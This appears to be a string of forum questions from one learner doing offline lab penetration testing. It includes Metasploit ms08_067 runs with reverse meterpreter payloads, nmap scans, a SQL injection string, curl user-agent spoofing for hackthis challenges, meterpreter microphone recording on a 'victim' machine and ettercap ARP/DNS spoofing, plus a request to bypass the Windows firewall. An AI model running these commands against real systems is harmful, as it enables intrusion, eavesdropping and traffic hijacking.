pierre

Hello, Habitually with Metasploit, i do this: 1.Pick an exploit 2.Setting exploit options 3.Pick a payload 4.Setting payload options 5.Run exploit 6.Connecting to the remote 7.Performing post-exploitation process But then I discovered that I can do this: 1.Create a .exe payload with options 2."use multi/handler" in metasploit 3.Setting handler options 4.Wait for a vitcim payload execution 6.Connecting to the remote 7.Performing post-exploitation process What is "multi/handler" ??

Yes and because it is virtual machine, MAC resolution isn't effective.. Yes it is like netdiscover command but thanks however :)

Hello, I have difficulties to recover the target operating system. Basically, I though a nmap might be all I need, but no. Here is my offline network topology : I run this nmap syntax scan : root@osboxes:~# nmap -T4 -A -v 192.168.0.2 Starting Nmap 7.01 ( https://nmap.org) at 2016-04-26 08:08 EDT NSE: Loaded 132 scripts for scanning. NSE: Script Pre-scanning. Initiating NSE at 08:08 Completed NSE at 08:08, 0.00s elapsed Initiating NSE at 08:08 Completed NSE at 08:08, 0.00s elapsed Initiating ARP Ping Scan at 08:08 Scanning 192.168.0.2 [1 port] Completed ARP Ping Scan at 08:08, 0.00s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. at 08:08 Completed Parallel DNS resolution of 1 host. at 08:08, 13.00s elapsed Initiating SYN Stealth Scan at 08:08 Scanning 192.168.0.2 [1000 ports] Completed SYN Stealth Scan at 08:08, 21.21s elapsed (1000 total ports) Initiating Service scan at 08:08 Initiating OS detection (try #1) against 192.168.0.2 Retrying OS detection (try #2) against 192.168.0.2 NSE: Script scanning 192.168.0.2. Initiating NSE at 08:08 Completed NSE at 08:08, 0.00s elapsed Initiating NSE at 08:08 Completed NSE at 08:08, 0.00s elapsed Nmap scan report for 192.168.0.2 Host is up (0.0015s latency). All 1000 scanned ports on 192.168.0.2 are filtered MAC Address: 08:00:27:3B:98:9D (Oracle VirtualBox virtual NIC) Too many fingerprints match this host to give specific OS details Network Distance: 1 hop TRACEROUTE HOP RTT ADDRESS 1 1.52 ms 192.168.0.2 NSE: Script Post-scanning. Initiating NSE at 08:08 Completed NSE at 08:08, 0.00s elapsed Initiating NSE at 08:08 Completed NSE at 08:08, 0.00s elapsed Read data files from: /usr/bin/../share/nmap OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 38.16 seconds Raw packets sent: 2049 (94.700KB) | Rcvd: 1 (28B) Nothing probant... If a turn off the windows firewall and I run the same scan : root@osboxes:~# nmap -T4 -A -v 192.168.0.2 Starting Nmap 7.01 ( https://nmap.org) at 2016-04-26 08:10 EDT NSE: Loaded 132 scripts for scanning. NSE: Script Pre-scanning. Initiating NSE at 08:10 Completed NSE at 08:10, 0.00s elapsed Initiating NSE at 08:10 Completed NSE at 08:10, 0.00s elapsed Initiating ARP Ping Scan at 08:10 Scanning 192.168.0.2 [1 port] Completed ARP Ping Scan at 08:10, 0.00s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. at 08:10 Completed Parallel DNS resolution of 1 host. at 08:10, 13.00s elapsed Initiating SYN Stealth Scan at 08:10 Scanning 192.168.0.2 [1000 ports] Discovered open port 139/tcp on 192.168.0.2 Discovered open port 135/tcp on 192.168.0.2 Discovered open port 3389/tcp on 192.168.0.2 Discovered open port 49157/tcp on 192.168.0.2 Discovered open port 49155/tcp on 192.168.0.2 Discovered open port 49153/tcp on 192.168.0.2 Discovered open port 445/tcp on 192.168.0.2 Discovered open port 49156/tcp on 192.168.0.2 Discovered open port 49152/tcp on 192.168.0.2 Discovered open port 49154/tcp on 192.168.0.2 Completed SYN Stealth Scan at 08:10, 1.34s elapsed (1000 total ports) Initiating Service scan at 08:10 Scanning 10 services on 192.168.0.2 Service scan Timing: About 50.00% done; ETC: 08:12 (0:00:53 remaining) Completed Service scan at 08:11, 58.59s elapsed (10 services on 1 host) Initiating OS detection (try #1) against 192.168.0.2 NSE: Script scanning 192.168.0.2. Initiating NSE at 08:11 Completed NSE at 08:11, 6.71s elapsed Initiating NSE at 08:11 Completed NSE at 08:11, 0.01s elapsed Nmap scan report for 192.168.0.2 Host is up (0.00072s latency). Not shown: 990 closed ports PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows 98 netbios-ssn 445/tcp open microsoft-ds Microsoft Windows 10 microsoft-ds 3389/tcp open ssl/ms-wbt-server? | ssl-cert: Subject: commonName=IE10Win7 | Issuer: commonName=IE10Win7 | Public Key type: rsa |_SHA-1: 005b cc4b 4154 6ddc 6b7e 22f2 05d5 fcb8 c7a4 27d2 |_ssl-date: 2016-04-26T12:11:36+00:00; 0s from scanner time. 49152/tcp open msrpc Microsoft Windows RPC 49153/tcp open msrpc Microsoft Windows RPC 49154/tcp open msrpc Microsoft Windows RPC 49155/tcp open msrpc Microsoft Windows RPC 49156/tcp open msrpc Microsoft Windows RPC 49157/tcp open msrpc Microsoft Windows RPC MAC Address: 08:00:27:3B:98:9D (Oracle VirtualBox virtual NIC) Device type: general purpose Running: Microsoft Windows 7|2008|8.1 OS CPE: cpe:/o:microsoft:windows_7::- cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_server_2008::sp1 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_8.1 OS details: Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows 8, or Windows 8.1 Update 1 Uptime guess: 0.005 days (since Tue Apr 26 08:04:02 2016) Network Distance: 1 hop TCP Sequence Prediction: Difficulty=260 (Good luck!) IP ID Sequence Generation: Incremental Service Info: OSs: Windows, Windows 98, Windows 10; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_98, cpe:/o:microsoft:windows_10 Host script results: | nbstat: NetBIOS name: IE10WIN7, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:3b:98:9d (Oracle VirtualBox virtual NIC) | Names: | IE10WIN7<00> Flags: <unique><active> | WORKGROUP<00> Flags: <group><active> | IE10WIN7<20> Flags: <unique><active> | WORKGROUP<1e> Flags: <group><active> | WORKGROUP<1d> Flags: <unique><active> |_ \x01\x02__MSBROWSE__\x02<01> Flags: <group><active> | smb-os-discovery: | OS: Windows 7 Enterprise 7601 Service Pack 1 (Windows 7 Enterprise 6.1) | OS CPE: cpe:/o:microsoft:windows_7::sp1 | Computer name: IE10Win7 | NetBIOS computer name: IE10WIN7 | Workgroup: WORKGROUP |_ System time: 2016-04-26T05:11:36-07:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) |_smbv2-enabled: Server supports SMBv2 protocol TRACEROUTE HOP RTT ADDRESS 1 0.72 ms 192.168.0.2 NSE: Script Post-scanning. Initiating NSE at 08:11 Completed NSE at 08:11, 0.00s elapsed Initiating NSE at 08:11 Completed NSE at 08:11, 0.00s elapsed Read data files from: /usr/bin/../share/nmap OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 82.07 seconds Raw packets sent: 1055 (47.118KB) | Rcvd: 1018 (41.450KB) Here is much more result. So how can I have at least OS recovering without having to turn off the firewall ? Thks

Thanks you very much haicen, I understand it very well now.

Thakns I'll have a look at the tuto :)

Hmm so previously client has to be social-engineering

root@osboxes:~# ping 192.168.0.3 PING 192.168.0.3 (192.168.0.3) 56(84) bytes of data. ^C --- 192.168.0.3 ping statistics --- 3 packets transmitted, 0 received, 100% packet loss, time 2016ms root@osboxes:~# nmap -p 445 192.168.0.3 Starting Nmap 7.01 ( https://nmap.org) at 2016-04-14 11:17 EDT Nmap scan report for 192.168.0.3 Host is up (0.00048s latency). PORT STATE SERVICE 445/tcp filtered microsoft-ds MAC Address: 08:00:27:A5:80:AD (Oracle VirtualBox virtual NIC) Nmap done: 1 IP address (1 host up) scanned in 13.32 seconds Firewall is well-activated so port 445 is filtered, and doesn't respond to connection attemps, so metasploit fails, right ?

I try both http and https payload, no results msf > use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > set RHOST 192.168.0.3 RHOST => 192.168.0.3 msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_https payload => windows/meterpreter/reverse_https msf exploit(ms08_067_netapi) > set LHOST 192.168.0.1 LHOST => 192.168.0.1 msf exploit(ms08_067_netapi) > check [*] 192.168.0.3:445 - Cannot reliably check exploitability. msf exploit(ms08_067_netapi) > exploit [*] Started HTTPS reverse handler on https://0.0.0.0:8443/ [-] Exploit failed [unreachable]: Rex::ConnectionTimeout The connection timed out (192.168.0.3:445). [*] Exploit completed, but no session was created. msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_http payload => windows/meterpreter/reverse_http msf exploit(ms08_067_netapi) > check [*] 192.168.0.3:445 - Cannot reliably check exploitability. msf exploit(ms08_067_netapi) > exploit [*] Started HTTP reverse handler on http://0.0.0.0:8080/ [-] Exploit failed [unreachable]: Rex::ConnectionTimeout The connection timed out (192.168.0.3:445). [*] Exploit completed, but no session was created. I try to exploit a Windows XP SP2 Yes but because the destination port is 80 with http payload, I thought it wouldn't block anymore..

Hello, I am actually working on this exploit. It works well when XP firewall is turn off. Unfortunately, when I turn it on, exploit doesn't work anymore. Topology : Procedure : msf > use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > set RHOST 192.168.0.3 RHOST => 192.168.0.3 msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(ms08_067_netapi) > set LHOST 192.168.0.1 LHOST => 192.168.0.1 msf exploit(ms08_067_netapi) > check [*] 192.168.0.3:445 - Cannot reliably check exploitability. msf exploit(ms08_067_netapi) > exploit [*] Started reverse TCP handler on 192.168.0.1:4444 [-] Exploit failed [unreachable]: Rex::ConnectionTimeout The connection timed out (192.168.0.3:445). [*] Exploit completed, but no session was created. Have you got any clue to bypass windows firewall ?!

Sorry I misunderstand what i was doing. When I was looking at the level to see if I've achieve, nothing was changed. But with : $ curl -b "PHPSESSID=am87lp4uir35jv2dej3pgn1r72" -A "secure_user_agent" "https://www.hackthis.co.uk/levels/basic+/2">> test.html % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 75200 0 75200 0 0 93314 0 --:--:-- --:--:-- --:--:-- 93300 When I open my test.html : I seems good :) I still don't know why I can't see the result of my command online but thanks anymore :)

Thanks for your answer. So here is my new command syntax : $ curl --user-agent "secure_user_agent" -b "PHPSESSID=bdv19903ltjg6hq0cfbhq6t6a7" https://www.hackthis.co.uk/levels/basic+/2 It still can't work !!! Very demoralizing because I achieve this with TamperData but i really want to do it by command line ...

Hello, I try to change my "user-agent" for a challenge. Problem is that my HTTP request don't fail but however my challenge isn't resolve by the way !! Here is my command : $ curl --user-agent "secure_user_agent" -c "PHPSESSID=8pp2qs7kjmjtq7b8423g3o8jj2" https://www.hackthis.co.uk/levels/basic+/2 Do you where is my error ?

Hello, I try to use Burp proxy to insert "secure_user_agent" in the header of my HTTP request while connecting on a website. The website is HTTPS. Here how I procede : 1-I add the proxy adress 2-I turn on the proxy in Burp 3-The proxy is well working 4-It fails for an HTTPS website !! 5-A short description from the "alert" section So do you know how to accede to HTTPS website with Burp ?

Thanks I understand. For example here : a' OR '1'='1 -The 1st quote is for the end of the first value -The 2nd quote is for the beginning of the 2nd value -The 3rd quote is for the end of the 2nd value -The 4th quote is for the beginning of the 3rd value Finally, no need for a 5th quote, because the 3rd value is auto-shorten, right ?

So the query seems like this to the DB : SELECT First_Name,Last_Name FROM users WHERE ID=’a’ OR ‘’ =’’; when I enter a' OR ''=' on the submit. So I think I've understand the background idea of bolean. But 2 things : 1) why do I have to put the first quote after the a ? To escape some restriction ? 2) why do I have to make a two statement boolean ? Why just ''=' doesn't work ? Thanks :) EDIT : I've seems to understand the first quote : These produce the same results :) So first quote mark the ends of the first value as you said :) But what about the other part : OR ''=' Just why double quotes before the equal ?

Yes I see But why do I have to put the quote : a' OR "=' It is use to prolong the query ?

Hello, I was wondering how this SQL syntax a' OR ''=' could list database user ?? Thnanks

Thanks :)

hmm seems no one use this module..

Hello, I have a book which says I can use recon-ng like this : recong-ng > use recon/hosts/gather/http/web/google_site Firstly, on my shell, the prompt isn't the same. Secondly, I can't find it the command line... The more close command line is this : [recon-ng][default] > use recon/hosts- recon/hosts-domains/migrate_hosts recon/hosts-hosts/ipinfodb recon/hosts-hosts/bing_ip recon/hosts-hosts/resolve recon/hosts-hosts/freegeoip recon/hosts-hosts/reverse_resolve recon/hosts-hosts/ip_neighbor So the command or module isn't available anymore ? Thanks :)

Hello, I can't understand how to record sound on my victim Windwos7 computer. I exploit the remote computer by a webshell. Here is how I do : I want to a 30 sec audio record : meterpreter > run sound_recorder -i 1 -l /home/lucky But then when I look into this folder, nothing : root@kali:/home/lucky# ls /home/lucky/logs/sound_recorder/NONAME_20160103.3213/ Why ???

Thanks you very much, it now works very !! I've just had to remove the dot :) Thanks you very much ! :)

it still does not works... Here is my /etc/ettercap/etter.dns configuration : microsoft.com A 192.168.0.1 *.microsoft.com A 192.168.0.1 www.microsoft.com PTR 192.168.0.1 # Wildcards in PTR are not allow ed I've done this : root@osboxes:~# ettercap -T -i eth0 -P dns_spoof -M arp /192.168.0.2.// Thu Dec 24 06:04:37 2015 [797997] UDP 192.168.0.2:137 --> 192.168.0.255:137 | (50) ............ FHFAEBEECACACACACACACACACACACAAA.. .. Thu Dec 24 06:04:38 2015 [358326] UDP 192.168.0.2:137 --> 192.168.0.255:137 | (50) ............ FHFAEBEECACACACACACACACACACACAAA.. .. Thu Dec 24 06:04:38 2015 [547962] UDP 192.168.0.2:137 --> 192.168.0.255:137 | (50) ............ FHFAEBEECACACACACACACACACACACAAA.. .. [same logs..] But my W7 computer (I turned off all firewall) isn't redirected to my own apache server. When I hit 192.168.0.1 in URL, W7 comes to my Apache server... What's wrongggg ?

So one has any ideas ??

*My computer are not connected on Internet.